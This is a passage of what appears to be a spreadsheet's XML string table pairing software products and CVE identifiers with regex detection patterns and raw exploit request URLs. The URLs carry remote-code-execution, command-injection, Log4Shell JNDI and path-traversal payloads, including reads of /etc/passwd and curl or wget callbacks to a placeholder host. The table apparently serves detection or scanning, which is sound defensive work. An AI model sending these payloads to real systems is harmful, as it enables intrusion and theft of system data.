    <t>/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D</t>
  </si>
  <si>
    <t>Gridx</t>
  </si>
  <si>
    <t>CVE-2020-19625</t>
  </si>
  <si>
    <t>.*?(?:/tests/support/stores/test_grid_filter\.php\?query=echo%20md5%28%22CVE-2020-19625%22%29%3B).*</t>
  </si>
  <si>
    <t>/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>CVE-2020-24949</t>
  </si>
  <si>
    <t>.*?(?:/infusions/downloads/downloads\.php\?cat_id=\$\{system\(ls\)\}).*</t>
  </si>
  <si>
    <t>/infusions/downloads/downloads.php?cat_id=${system(ls)}</t>
  </si>
  <si>
    <t>Rails</t>
  </si>
  <si>
    <t>CVE-2020-8163</t>
  </si>
  <si>
    <t>.*?(?:\?IO\.popen\(%27cat%20%2Fetc%2Fpasswd%27\)\.read%0A%23).*</t>
  </si>
  <si>
    <t>?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23</t>
  </si>
  <si>
    <t>UnRaid</t>
  </si>
  <si>
    <t>CVE-2020-5847</t>
  </si>
  <si>
    <t>.*?(?:/webGui/images/green-on\.png/\?path=x&amp;site\[x\]\[text\]=%3C\?php%20echo%20md5\(%22CVE-2020-5847%22\);%20\?%3E).*</t>
  </si>
  <si>
    <t>/webGui/images/green-on.png/?path=x&amp;site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E</t>
  </si>
  <si>
    <t>Yii</t>
  </si>
  <si>
    <t>CVE-2020-15148</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?r=test/sss&amp;data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==).*</t>
  </si>
  <si>
    <t>/index.php?r=test/sss&amp;data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==</t>
  </si>
  <si>
    <t>Zyxel NAS Firmware</t>
  </si>
  <si>
    <t>CVE-2020-9054</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/weblogin\.cgi\?username=admin';cat /etc/passwd).*</t>
  </si>
  <si>
    <t>/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd</t>
  </si>
  <si>
    <t>Nodejs Squirrelly</t>
  </si>
  <si>
    <t>CVE-2021-32819</t>
  </si>
  <si>
    <t>.*?(?:/\?Express=aaaa&amp;autoEscape=&amp;defaultFilter=e%27\);var\+require=global\.require\+%7C%7C\+global\.process\.mainModule\.constructor\._load;\+require\(%27child_process%27\)\.exec\(%27wget%20http://.*?%27\);//).*</t>
  </si>
  <si>
    <t>/?Express=aaaa&amp;autoEscape=&amp;defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//</t>
  </si>
  <si>
    <t>Ruby Dragonfly</t>
  </si>
  <si>
    <t>CVE-2021-33564</t>
  </si>
  <si>
    <t>.*?(?:/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==|/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==).*</t>
  </si>
  <si>
    <t>/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==|/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==</t>
  </si>
  <si>
    <t>Spring</t>
  </si>
  <si>
    <t>CVE-2021-22053</t>
  </si>
  <si>
    <t>.*?(?:/hystrix/;a=a/__\$\{T \(java\.lang\.Runtime\)\.getRuntime\(\)\.exec\("certutil -urlcache -split -f http://.*?"\)\}__::\.x/|/hystrix/;a=a/__\$\{T \(java\.lang\.Runtime\)\.getRuntime\(\)\.exec\("curl http://.*?"\)\}__::\.x/).*</t>
  </si>
  <si>
    <t>/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("certutil -urlcache -split -f http://{{interactsh-url}}")}__::.x/|/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")}__::.x/</t>
  </si>
  <si>
    <t>Websvn</t>
  </si>
  <si>
    <t>CVE-2021-32305</t>
  </si>
  <si>
    <t>.*?(?:/search\.php\?search=%22;wget\+http%3A%2F%2F.*?%27;%22).*</t>
  </si>
  <si>
    <t>/search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>CVE-2022-26134</t>
  </si>
  <si>
    <t>.*?(?:/%24%7B%28%23a%3D%40org\.apache\.commons\.io\.IOUtils%40toString%28%40java\.lang\.Runtime%40getRuntime%28%29\.exec%28%22whoami%22%29\.getInputStream%28%29%2C%22utf-8%22%29%29\.%28%40com\.opensymphony\.webwork\.ServletActionContext%40getResponse%28%29\.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/|/%24%7B%40java\.lang\.Runtime%40getRuntime%28%29\.exec%28%22nslookup%20.*?%22%29%7D/).*</t>
  </si>
  <si>
    <t>/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/|/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/</t>
  </si>
  <si>
    <t>Hitachi Pentaho Business Analytics Server</t>
  </si>
  <si>
    <t>CVE-2022-43769</t>
  </si>
  <si>
    <t>.*?(?:/pentaho/api/ldap/config/ldapTreeNodeChildren/require\.js\?url=%23\{T\(java\.net\.InetAddress\)\.getByName\('.*?'\)\}&amp;mgrDn=a&amp;pwd=a).*</t>
  </si>
  <si>
    <t>/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&amp;mgrDn=a&amp;pwd=a</t>
  </si>
  <si>
    <t>CVE-2022-4060</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=upg_datatable&amp;field=field:exec:head\+-1\+/etc/passwd:NULL:NULL).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=upg_datatable&amp;field=field:exec:head+-1+/etc/passwd:NULL:NULL</t>
  </si>
  <si>
    <t>CVE-2022-0346</t>
  </si>
  <si>
    <t>.*?(?:/\?p=1&amp;xsg-provider=data://text/html,&lt;\?php%20echo%20md5\("CVE-2022-0346"\);%20//&amp;xsg-format=yyy&amp;xsg-type=zz&amp;xsg-page=pp|/\?p=1&amp;xsg-provider=%3Cimg%20src%20onerror=alert\(document\.domain\)%3E&amp;xsg-format=yyy&amp;xsg-type=zz&amp;xsg-page=pp).*</t>
  </si>
  <si>
    <t>/?p=1&amp;xsg-provider=data://text/html,&lt;?php%20echo%20md5("CVE-2022-0346");%20//&amp;xsg-format=yyy&amp;xsg-type=zz&amp;xsg-page=pp|/?p=1&amp;xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&amp;xsg-format=yyy&amp;xsg-type=zz&amp;xsg-page=pp</t>
  </si>
  <si>
    <t>Chaosblade</t>
  </si>
  <si>
    <t>CVE-2023-47105</t>
  </si>
  <si>
    <t>.*?(?:/chaosblade\?cmd=\$\(id\)).*</t>
  </si>
  <si>
    <t>/chaosblade?cmd=$(id)</t>
  </si>
  <si>
    <t>MagnusBilling</t>
  </si>
  <si>
    <t>CVE-2023-30258</t>
  </si>
  <si>
    <t>.*?(?:/mbilling/lib/icepay/icepay\.php\?democ=.*?;curl%20.*?;#).*</t>
  </si>
  <si>
    <t>/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#</t>
  </si>
  <si>
    <t>Ruckus Wireless Admin</t>
  </si>
  <si>
    <t>CVE-2023-25717</t>
  </si>
  <si>
    <t>.*?(?:/forms/doLogin\?login_username=admin&amp;password=password\$\(curl%20.*?\)&amp;x=0&amp;y=0).*</t>
  </si>
  <si>
    <t>/forms/doLogin?login_username=admin&amp;password=password$(curl%20{{interactsh-url}})&amp;x=0&amp;y=0</t>
  </si>
  <si>
    <t>TimeKeeper</t>
  </si>
  <si>
    <t>CVE-2023-31465</t>
  </si>
  <si>
    <t>.*?(?:/getsamplebacklog\?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&amp;arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316\.328%7c%7cnslookup%20%24\(xxd%20-pu%20%3c%3c%3c%20%24\(whoami\)\)\..*?%7c%7cx%22%2c%22latest%22%3a1676976916\.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22.*?%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&amp;arg3=undefined&amp;arg4=undefined&amp;arg5=undefined&amp;arg6=undefined&amp;arg7=undefined).*</t>
  </si>
  <si>
    <t>/getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&amp;arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&amp;arg3=undefined&amp;arg4=undefined&amp;arg5=undefined&amp;arg6=undefined&amp;arg7=undefined</t>
  </si>
  <si>
    <t>XWiki</t>
  </si>
  <si>
    <t>CVE-2023-37462</t>
  </si>
  <si>
    <t>.*?(?:/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d\?sheet=SkinsCode\.XWikiSkinsSheet&amp;xpage=view|/asyncrenderer/.*?\?clientId=.*?&amp;timeout=500&amp;wiki=xwiki).*</t>
  </si>
  <si>
    <t>/asyncrenderer/{{url}}?clientId={{id}}&amp;timeout=500&amp;wiki=xwiki|/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&amp;xpage=view</t>
  </si>
  <si>
    <t>FoxCMS</t>
  </si>
  <si>
    <t>CVE-2025-29306</t>
  </si>
  <si>
    <t>.*?(?:/images/index\.html\?id=%24%7B%40print_r%28%40system%28%22.*?%22%29%29%7D).*</t>
  </si>
  <si>
    <t>/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D</t>
  </si>
  <si>
    <t>Ivanti Endpoint Manager Mobile</t>
  </si>
  <si>
    <t>CVE-2025-4427</t>
  </si>
  <si>
    <t>.*?(?:/api/v2/featureusage_history\?adminDeviceSpaceId=131&amp;format=%24%7b''\.getClass\(\)\.forName\('java\.lang\.Runtime'\)\.getMethod\('getRuntime'\)\.invoke\(''\.getClass\(\)\.forName\('java\.lang\.Runtime'\)\)\.exec\('curl%20.*?'\)%7d|/api/v2/featureusage\?adminDeviceSpaceId=131&amp;format=%24%7b''\.getClass\(\)\.forName\('java\.lang\.Runtime'\)\.getMethod\('getRuntime'\)\.invoke\(''\.getClass\(\)\.forName\('java\.lang\.Runtime'\)\)\.exec\('curl%20.*?'\)%7d).*</t>
  </si>
  <si>
    <t>/api/v2/featureusage?adminDeviceSpaceId=131&amp;format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d|/api/v2/featureusage_history?adminDeviceSpaceId=131&amp;format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d</t>
  </si>
  <si>
    <t>MeteoBridge</t>
  </si>
  <si>
    <t>CVE-2025-4008</t>
  </si>
  <si>
    <t>.*?(?:/public/template\.cgi\?templatefile=\$\(id\)).*</t>
  </si>
  <si>
    <t>/public/template.cgi?templatefile=$(id)</t>
  </si>
  <si>
    <t>Pterodactyl Panel</t>
  </si>
  <si>
    <t>CVE-2025-49132</t>
  </si>
  <si>
    <t>.*?(?:/locales/locale\.json\?locale=\.\.%2F\.\.%2Fconfig&amp;namespace=app).*</t>
  </si>
  <si>
    <t>/locales/locale.json?locale=..%2F..%2Fconfig&amp;namespace=app</t>
  </si>
  <si>
    <t>SawtoothSoftware Lighthouse Studio</t>
  </si>
  <si>
    <t>CVE-2025-34300</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/ciwweb\.pl\?hid_javascript=1&amp;hid_Random_ACARAT=\[%25.*?\*.*?%25\]&amp;hid_Random_ACARAT=x).*</t>
  </si>
  <si>
    <t>/cgi-bin/ciwweb.pl?hid_javascript=1&amp;hid_Random_ACARAT=[%25{{num1}}*{{num2}}%25]&amp;hid_Random_ACARAT=x</t>
  </si>
  <si>
    <t>CVE-2025-24893</t>
  </si>
  <si>
    <t>.*?(?:/bin/get/Main/SolrSearch\?media=rss&amp;text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln\(%22cat%20/etc/passwd%22\.execute\(\)\.text\)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20).*</t>
  </si>
  <si>
    <t>/bin/get/Main/SolrSearch?media=rss&amp;text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20</t>
  </si>
  <si>
    <t>.*?(?:/c42api/v3/LoginConfiguration\?username=\$\{jndi:ldap://\$\{:-.*?\}\$\{:-.*?\}\.\$\{hostName\}\.username\..*?/test\}&amp;url=https://localhost).*</t>
  </si>
  <si>
    <t>/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&amp;url=https://localhost</t>
  </si>
  <si>
    <t>.*?(?:/druid/coordinator/v1/lookups/config/\$%7bjndi:ldap:%2f%2f.*?%2ftea%7d).*</t>
  </si>
  <si>
    <t>/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d</t>
  </si>
  <si>
    <t>Elasticsearch</t>
  </si>
  <si>
    <t>.*?(?:/_search\?a=\$%7Bjndi%3Aldap%3A%2F%2F\$%7B%3A-.*?%7D\$%7B%3A-.*?%7D\.\$%7BhostName%7D\.search\..*?%7D).*</t>
  </si>
  <si>
    <t>/_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D</t>
  </si>
  <si>
    <t>Jitsi Meet</t>
  </si>
  <si>
    <t>.*?(?:/http-bind\?room=\$\{jndi:ldap://\$\{:-.*?\}\$\{:-.*?\}\.\$\{hostName\}\.username\..*?/.*?\}).*</t>
  </si>
  <si>
    <t>/http-bind?room=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}</t>
  </si>
  <si>
    <t>.*?(?:/data/sys-common/datajson\.js\?s_bean=sysFormulaSimulateByJS&amp;script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20.*?%22%29&amp;type=1).*</t>
  </si>
  <si>
    <t>/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&amp;script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&amp;type=1</t>
  </si>
  <si>
    <t>Logstash</t>
  </si>
  <si>
    <t>.*?(?:/api/logstash/pipeline/\$\{jndi:ldap://\$\{:-.*?\}\$\{:-.*?\}\.\$\{hostName\}\.username\..*?/.*?\}).*</t>
  </si>
  <si>
    <t>/api/logstash/pipeline/${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}</t>
  </si>
  <si>
    <t>Metabase</t>
  </si>
  <si>
    <t>.*?(?:/api/geojson\?url=\$\{jndi:ldap://\$\{:-.*?\}\$\{:-.*?\}\.\$\{hostName\}\.url\..*?\}).*</t>
  </si>
  <si>
    <t>/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}</t>
  </si>
  <si>
    <t>NUUO NVRmini</t>
  </si>
  <si>
    <t>.*?(?:/upgrade_handle\.php\?cmd=writeuploaddir&amp;uploaddir=%27;whoami;%27).*</t>
  </si>
  <si>
    <t>/upgrade_handle.php?cmd=writeuploaddir&amp;uploaddir=%27;whoami;%27</t>
  </si>
  <si>
    <t>Okta</t>
  </si>
  <si>
    <t>.*?(?:/login/SAML\?=\$\{jndi:ldap://\$\{:-.*?\}\$\{:-.*?\}\.\$\{hostName\}\.username\..*?/.*?\}).*</t>
  </si>
  <si>
    <t>/login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}</t>
  </si>
  <si>
    <t>OpenSNS</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=weibo/Share/shareBox&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id\[status\]=1%26id\[method\]=Schedule-%3E_validationFieldItem%26id\[4\]=function%26\[6\]\[\]=%26id\[0\]=cmd%26id\[1\]=assert%26id\[args\]=cmd=system\(ver\)|/index\.php\?s=weibo/Share/shareBox&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id\[status\]=1%26id\[method\]=Schedule-%3E_validationFieldItem%26id\[4\]=function%26\[6\]\[\]=%26id\[0\]=cmd%26id\[1\]=assert%26id\[args\]=cmd=system\(id\)).*</t>
  </si>
  <si>
    <t>/index.php?s=weibo/Share/shareBox&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)|/index.php?s=weibo/Share/shareBox&amp;query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)</t>
  </si>
  <si>
    <t>.*?(?:/dr/authentication/oauth2/oauth2login\?error=\$%7Bjndi%3Aldap%3A%2F%2F\$%7B%3A-.*?%7D\$%7B%3A-.*?%7D\.\$%7BhostName%7D\.uri\..*?%7D).*</t>
  </si>
  <si>
    <t>/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D</t>
  </si>
  <si>
    <t>WIFISKY</t>
  </si>
  <si>
    <t>.*?(?:/notice/confirm\.php\?t=%3bping\+-c\+3\+.*?).*</t>
  </si>
  <si>
    <t>/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}</t>
  </si>
  <si>
    <t>WebUI</t>
  </si>
  <si>
    <t>.*?(?:/mainfile\.php\?username=test&amp;password=testpoc&amp;_login=1&amp;Logon=%27%3Becho%20md5\(TestPoc\)%3B%27).*</t>
  </si>
  <si>
    <t>/mainfile.php?username=test&amp;password=testpoc&amp;_login=1&amp;Logon=%27%3Becho%20md5(TestPoc)%3B%27</t>
  </si>
  <si>
    <t>ThinkCMF</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?g=g&amp;m=Door&amp;a=index&amp;content=&lt;\?php%20echo%20md5\('ThinkCMF'\);).*</t>
  </si>
  <si>
    <t>/index.php?g=g&amp;m=Door&amp;a=index&amp;content=&lt;?php%20echo%20md5('ThinkCMF');\|/{{randstr}}.php</t>
  </si>
  <si>
    <t>通达OA</t>
  </si>
  <si>
    <t>.*?(?:/general/appbuilder/web/portal/gateway/getdata\?activeTab=%E5%27%19,1%3D%3Eeval\(base64_decode\(%22.*?%22\)\)\)%3B/\*&amp;id=19&amp;module=Carouselimage).*</t>
  </si>
  <si>
    <t>/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&amp;id=19&amp;module=Carouselimage</t>
  </si>
  <si>
    <t>Alcatel</t>
  </si>
  <si>
    <t>远程命令执行</t>
  </si>
  <si>
    <t>CVE-2007-3010</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/masterCGI\?ping=nomip&amp;user=;id;).*</t>
  </si>
  <si>
    <t>/cgi-bin/masterCGI?ping=nomip&amp;user=;id;</t>
  </si>
  <si>
    <t>CVE-2016-4977</t>
  </si>
  <si>
    <t>.*?(?:/oauth/authorize\?response_type=\$\{13337\*73331\}&amp;client_id=acme&amp;scope=openid&amp;redirect_uri=http://test).*</t>
  </si>
  <si>
    <t>/oauth/authorize?response_type=${13337*73331}&amp;client_id=acme&amp;scope=openid&amp;redirect_uri=http://test</t>
  </si>
  <si>
    <t>CVE-2018-14933</t>
  </si>
  <si>
    <t>.*?(?:/upgrade_handle\.php\?cmd=writeuploaddir&amp;uploaddir=%27;id;%27).*</t>
  </si>
  <si>
    <t>/upgrade_handle.php?cmd=writeuploaddir&amp;uploaddir=%27;id;%27</t>
  </si>
  <si>
    <t>Zeroshell</t>
  </si>
  <si>
    <t>CVE-2019-12725</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/kerbynet\?Action=StartSessionSubmit&amp;User='%0acat%20/etc/passwd%0a'&amp;PW=).*</t>
  </si>
  <si>
    <t>/cgi-bin/kerbynet?Action=StartSessionSubmit&amp;User='%0acat%20/etc/passwd%0a'&amp;PW=</t>
  </si>
  <si>
    <t>LinuxKI Toolset</t>
  </si>
  <si>
    <t>CVE-2020-7209</t>
  </si>
  <si>
    <t>.*?(?:/linuxki/experimental/vis/kivis\.php\?type=kitrace&amp;pid=0;echo%20START;cat%20/etc/passwd;echo%20END;).*</t>
  </si>
  <si>
    <t>/linuxki/experimental/vis/kivis.php?type=kitrace&amp;pid=0;echo%20START;cat%20/etc/passwd;echo%20END;</t>
  </si>
  <si>
    <t>Mida eFramework</t>
  </si>
  <si>
    <t>CVE-2020-15920</t>
  </si>
  <si>
    <t>.*?(?:/PDC/ajaxreq\.php\?PARAM=127\.0\.0\.1\+-c\+0%3B\+cat\+%2Fetc%2Fpasswd&amp;DIAGNOSIS=PING).*</t>
  </si>
  <si>
    <t>/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&amp;DIAGNOSIS=PING</t>
  </si>
  <si>
    <t>WebLogic</t>
  </si>
  <si>
    <t>CVE-2020-14882</t>
  </si>
  <si>
    <t>.*?(?:/console/images/%252e%252e%252fconsole\.portal\?_nfpb=true&amp;_pageLabel=&amp;handle=com\.bea\.core\.repackaged\.springframework\.context\.support\.FileSystemXmlApplicationContext\('http://.*?'\)).*</t>
  </si>
  <si>
    <t>/console/images/%252e%252e%252fconsole.portal?_nfpb=true&amp;_pageLabel=&amp;handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')</t>
  </si>
  <si>
    <t>TerraMaster TOS</t>
  </si>
  <si>
    <t>CVE-2020-28188</t>
  </si>
  <si>
    <t>.*?(?:/tos/index\.php\?explorer/pathList&amp;path=%60curl\+http%3a//.*?\+-H\+'User-Agent%3a\+.*?'%60|/include/makecvs\.php\?Event=%60curl\+http%3a//.*?\+-H\+'User-Agent%3a\+.*?'%60).*</t>
  </si>
  <si>
    <t>/include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60|/tos/index.php?explorer/pathList&amp;path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60</t>
  </si>
  <si>
    <t>Motorola Baby Monitors</t>
  </si>
  <si>
    <t>CVE-2021-3577</t>
  </si>
  <si>
    <t>.*?(?:/\?action=command&amp;command=set_city_timezone&amp;value=\$\(wget%20http://.*?\)\)).*</t>
  </si>
  <si>
    <t>/?action=command&amp;command=set_city_timezone&amp;value=$(wget%20http://{{interactsh-url}}))</t>
  </si>
  <si>
    <t>Telesquare TLR</t>
  </si>
  <si>
    <t>CVE-2024-29269</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/admin\.cgi\?Command=sysCommand&amp;Cmd=ifconfig).*</t>
  </si>
  <si>
    <t>/cgi-bin/admin.cgi?Command=sysCommand&amp;Cmd=ifconfig</t>
  </si>
  <si>
    <t>.*?(?:/config/asst/system_setPassWordValidate\.action/capture_handle\.action\?captureFlag=true&amp;captureCommand=ping%20.*?%20index\.pcap).*</t>
  </si>
  <si>
    <t>/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&amp;captureCommand=ping%20{{interactsh-url}}%20index.pcap</t>
  </si>
  <si>
    <t>深信服日志中心</t>
  </si>
  <si>
    <t>.*?(?:/tool/log/c\.php\?strip_slashes=system&amp;host=ipconfig).*</t>
  </si>
  <si>
    <t>/tool/log/c.php?strip_slashes=system&amp;host=ipconfig</t>
  </si>
  <si>
    <t>TamronOS IPTV/VOD</t>
  </si>
  <si>
    <t>.*?(?:/api/ping\?count=5&amp;host=;cat%20/etc/passwd;&amp;port=80&amp;source=1\.1\.1\.1&amp;type=icmp).*</t>
  </si>
  <si>
